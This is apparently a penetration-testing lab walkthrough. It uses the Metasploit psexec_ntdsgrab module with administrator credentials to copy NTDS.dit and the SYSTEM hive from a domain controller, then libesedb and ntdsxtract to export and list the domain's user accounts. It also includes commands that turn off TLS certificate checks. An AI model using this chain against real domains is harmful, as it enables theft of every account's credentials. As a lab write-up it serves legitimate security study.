metasploit - psexec_ntdsgrab / libesedb / ntdsxtract

psexec_ntdsgrab

msf auxiliary(psexec_ntdsgrab) > show options 

Module options (auxiliary/admin/smb/psexec_ntdsgrab):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CREATE_NEW_VSC        false            no        If true, attempts to create a volume shadow copy
   RHOST                 192.168.10.32    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             PENTEST.COM      no        The Windows domain to use for authentication
   SMBPass               pass1234PASS~    no        The password for the specified username
   SMBSHARE              C$               yes       The name of a writeable share on the server
   SMBUser               administrator    no        The username to authenticate as
   VSCPATH                                no        The path to the target Volume Shadow Copy
   WINPATH               Windows          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf auxiliary(psexec_ntdsgrab) > run

[*] 192.168.10.32:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Checking if NTDS.dit was copied.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Downloading ntds.dit file
[+] 192.168.10.32:445 - ntds.dit stored at /home/notfound/.msf4/loot/20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
[*] 192.168.10.32:445 - Downloading SYSTEM hive file
[+] 192.168.10.32:445 - SYSTEM hive stored at /home/notfound/.msf4/loot/20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
Note: the .dit file and the SYSTEM hive together are enough to recover credential material for every domain account, so the loot directory should be access-restricted and the files deleted once the engagement is finished.
[*] 192.168.10.32:445 - Executing cleanup...
[*] 192.168.10.32:445 - Cleanup was successful
[*] Auxiliary module execution completed

Install libesedb

root:/ /# uname -a
Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux
root:/tmp/ntds /# wget --no-check-certificate https://github.com/libyal/libesedb/archive/20150409.zip
Note: --no-check-certificate disables TLS certificate validation for this download, so the archive is built and installed as root without any integrity check; prefer fetching the release with certificate checking enabled and compare it against a trusted copy.
root:/tmp/ntds /# unzip -x 20150409.zip
root:/tmp/ntds /# cd libesedb-20150409/
root:/tmp/ntds /# ./synclibs.sh
root:/tmp/ntds /# git config --global http.sslverify false
Note: this is a persistent, user-wide setting that disables TLS certificate verification for every git https operation, not just this build; reset it afterwards with git config --global http.sslverify true.
root:/tmp/ntds /# ./autogen.sh
root:/tmp/ntds /# ./configure
root:/tmp/ntds /# make
root:/tmp/ntds /# make install
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit 
esedbexport: error while loading shared libraries: libesedb.so.1: cannot open shared object file: No such file or directory
root:/tmp/ntds /# ldconfig
make install placed libesedb.so.1 in a directory the dynamic loader had not yet indexed; ldconfig rebuilds the shared-library cache so esedbexport can find it.
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit 
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag1) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
root:/tmp/ntds/ntds_demo /# ls -l
total 33572
-rw-r--r-- 1 root root 12599296 Sep 12 12:48 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
-rw-r--r-- 1 root root  9773056 Sep 12 12:35 20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
-rw-r--r-- 1 root root     1104 Sep 12 12:50 backlinks.map
-rw-r--r-- 1 root root    72779 Sep 12 12:50 childsrid.map
-rw-r--r-- 1 root root 11021285 Sep 12 12:39 datatable.3
-rw-r--r-- 1 root root      613 Sep 12 12:39 hiddentable.4
-rw-r--r-- 1 root root    42735 Sep 12 12:50 lidrid.map
-rw-r--r-- 1 root root     1013 Sep 12 12:50 links.map
-rw-r--r-- 1 root root     5777 Sep 12 12:39 link_table.5
-rw-r--r-- 1 root root       57 Sep 12 12:39 MSysDefrag1.9
-rw-r--r-- 1 root root    69512 Sep 12 12:38 MSysObjects.0
-rw-r--r-- 1 root root    69512 Sep 12 12:38 MSysObjectsShadow.1
-rw-r--r-- 1 root root      103 Sep 12 12:38 MSysUnicodeFixupVer2.2
drwxr-xr-x 5 root root     4096 Sep 12 12:44 ntdsxtract
-rw-r--r-- 1 root root    57725 Sep 12 12:50 offlid.map
-rw-r--r-- 1 root root      152 Sep 12 12:50 pek.map
-rw-r--r-- 1 root root       80 Sep 12 12:39 quota_rebuild_progress_table.11
-rw-r--r-- 1 root root      771 Sep 12 12:39 quota_table.10
-rw-r--r-- 1 root root   180963 Sep 12 12:50 ridguid.map
-rw-r--r-- 1 root root    75646 Sep 12 12:50 ridname.map
-rw-r--r-- 1 root root     3583 Sep 12 12:50 ridsid.map
-rw-r--r-- 1 root root    23677 Sep 12 12:50 ridtype.map
-rw-r--r-- 1 root root       14 Sep 12 12:39 sdpropcounttable.6
-rw-r--r-- 1 root root       96 Sep 12 12:39 sdproptable.7
-rw-r--r-- 1 root root   182041 Sep 12 12:39 sd_table.8
-rw-r--r-- 1 root root    50885 Sep 12 12:50 typeidname.map
-rw-r--r-- 1 root root    67338 Sep 12 12:50 typerid.map
root:/tmp/ntds/ntds_demo /# 

NTDSXTRACT

root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dscomputers.py datatable.3 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsgroups.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsfileinformation.py 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./

[+] Started at: Sat, 12 Sep 2015 04:49:55 UTC
[+] Started with options:
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 3458 records processed
[+] Sanity checks...
      Schema record id: 1774
      Schema type id: 10
[+] Extracting schema information - 100% -> 1517 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/links.map'
[+] Rebuilding maps...
[+] Extracting object links...

List of users:
==============
Record ID:            3510
User name:            Administrator
User principal name:  
SAM Account name:     Administrator
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 6b36f08b-c8cf-4eab-9e18-ae1bdce0e4f6
SID:                  S-1-5-21-495298362-4107897003-3932503283-500
When created:         2015-04-11 10:08:32+00:00
When changed:         2015-09-11 17:15:30+00:00
Account expires:      Never
Password last set:    2015-09-11 17:15:30.234375+00:00
Last logon:           2015-09-11 17:15:59.890625+00:00
Last logon timestamp: 2015-09-11 17:15:30.218750+00:00
Bad password time     2015-04-11 13:34:02.937500+00:00
Logon count:          19
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, Administrator

Record ID:            3511
User name:            Guest
User principal name:  
SAM Account name:     Guest
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 5d3b8bbf-5d0a-4573-96fa-ecdf0d68b2b9
SID:                  S-1-5-21-495298362-4107897003-3932503283-501
When created:         2015-04-11 10:08:32+00:00
When changed:         2015-04-11 10:08:32+00:00
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    ACCOUNTDISABLE
    PWD_NOTREQD
    NORMAL_ACCOUNT
    DONT_EXPIRE_PASSWORD
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, Guest

Record ID:            3557
User name:            krbtgt
User principal name:  
SAM Account name:     krbtgt
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 d4a001b1-1d6f-4033-8396-5b50ed442416
SID:                  S-1-5-21-495298362-4107897003-3932503283-502
When created:         2015-04-11 10:21:27+00:00
When changed:         2015-04-11 10:36:38+00:00
Account expires:      Never
Password last set:    2015-04-11 10:21:27.750000+00:00
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    ACCOUNTDISABLE
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, krbtgt

Record ID:            3717
User name:            python
User principal name:  
SAM Account name:     python
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 37218973-1887-4768-a98b-c9c797769ebc
SID:                  S-1-5-21-495298362-4107897003-3932503283-1111
When created:         2015-04-11 10:40:57+00:00
When changed:         2015-04-11 10:42:50+00:00
Account expires:      Never
Password last set:    2015-04-11 10:40:57.406250+00:00
Last logon:           2015-04-11 11:27:15.796875+00:00
Last logon timestamp: 2015-04-11 10:42:50.531250+00:00
Bad password time     2015-04-11 11:26:15.359375+00:00
Logon count:          36
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, python

Record ID:            3720
User name:            juzi
User principal name:  
SAM Account name:     juzi
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 b29311a1-595a-4a8c-a292-2f623ad2969b
SID:                  S-1-5-21-495298362-4107897003-3932503283-1114
When created:         2015-04-11 10:42:09+00:00
When changed:         2015-04-11 10:47:14+00:00
Account expires:      Never
Password last set:    2015-04-11 10:42:09.375000+00:00
Last logon:           2015-04-11 11:50:41.937500+00:00
Last logon timestamp: 2015-04-11 10:47:14.015625+00:00
Bad password time     2015-04-11 10:54:08.187500+00:00
Logon count:          7
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, juzi

Record ID:            3722
User name:            jin
User principal name:  
SAM Account name:     jin
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 23b53357-d35c-4586-a239-cd930497bf7a
SID:                  S-1-5-21-495298362-4107897003-3932503283-1116
When created:         2015-04-11 10:46:32+00:00
When changed:         2015-04-11 10:49:45+00:00
Account expires:      Never
Password last set:    2015-04-11 10:46:32.250000+00:00
Last logon:           2015-04-11 10:49:49+00:00
Last logon timestamp: 2015-04-11 10:49:45.875000+00:00
Bad password time     Never
Logon count:          5
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, jin

Record ID:            3726
User name:            debug
User principal name:  
SAM Account name:     debug
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 114da9cb-7770-4ec8-b2b1-03b2505521db
SID:                  S-1-5-21-495298362-4107897003-3932503283-1119
When created:         2015-04-11 10:56:04+00:00
When changed:         2015-04-11 10:58:13+00:00
Account expires:      Never
Password last set:    2015-04-11 10:56:04.515625+00:00
Last logon:           2015-04-11 17:17:21.250000+00:00
Last logon timestamp: 2015-04-11 10:58:13+00:00
Bad password time     Never
Logon count:          95
Bad password count:   0
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, debug

References

http://www.ntdsxtract.com/
https://github.com/libyal/libesedb/
